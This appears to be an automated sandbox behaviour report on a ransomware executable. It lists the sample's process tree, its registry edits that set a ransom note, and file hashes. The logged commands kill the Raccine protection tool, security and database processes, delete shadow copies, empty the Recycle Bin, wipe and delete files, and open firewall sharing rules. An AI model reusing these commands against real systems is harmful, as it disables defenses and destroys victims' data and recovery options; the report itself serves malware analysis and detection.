0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 812 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 812 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1724 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1724 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1724 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1724 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe sc.exe PID 652 wrote to memory of 1676 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1676 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1676 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1676 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1900 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1900 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1900 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1900 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 840 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 840 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 840 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 840 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1672 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1672 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1672 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe PID 652 wrote to memory of 1672 652 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe taskkill.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY WAS HACKED AND COMPROMISED!!!" 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\nWe has DOWNLOADED of your PRIVATE SENSITIVE Data!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe"C:\Users\Admin\AppData\Local\Temp\0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:652 -
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:1044
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:1096
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:1956
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:1000
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:1644
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:924
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:668
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:1564
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:1912
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:812
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵PID:1724
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:840
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:420
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:548
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:1132
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:792
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:796
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:1532
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:1112
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:1672
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:1132
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:1432
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:1728
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:1428
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
PID:1096
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:812
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:1044
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:1684
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216.exe2⤵
- Deletes itself
PID:1224 -
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵PID:1844
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
f2aadebcef102841fc20ec431eb111b2
SHA1457cf4b6d11fdf754510583aa8a380795abd6d4a
SHA256e338977b26e843a646ab3bb2974f45d663d95ec64b102ed8b60ba2bc98d59003
SHA512e1e3bd908a69cc2df2e9657f3405ad14bddc3085fb582d0fb2b521e434252144cfbafdf9dce2f0c6885116f0daec93fbc892df934485abc5958f86456ac01fb5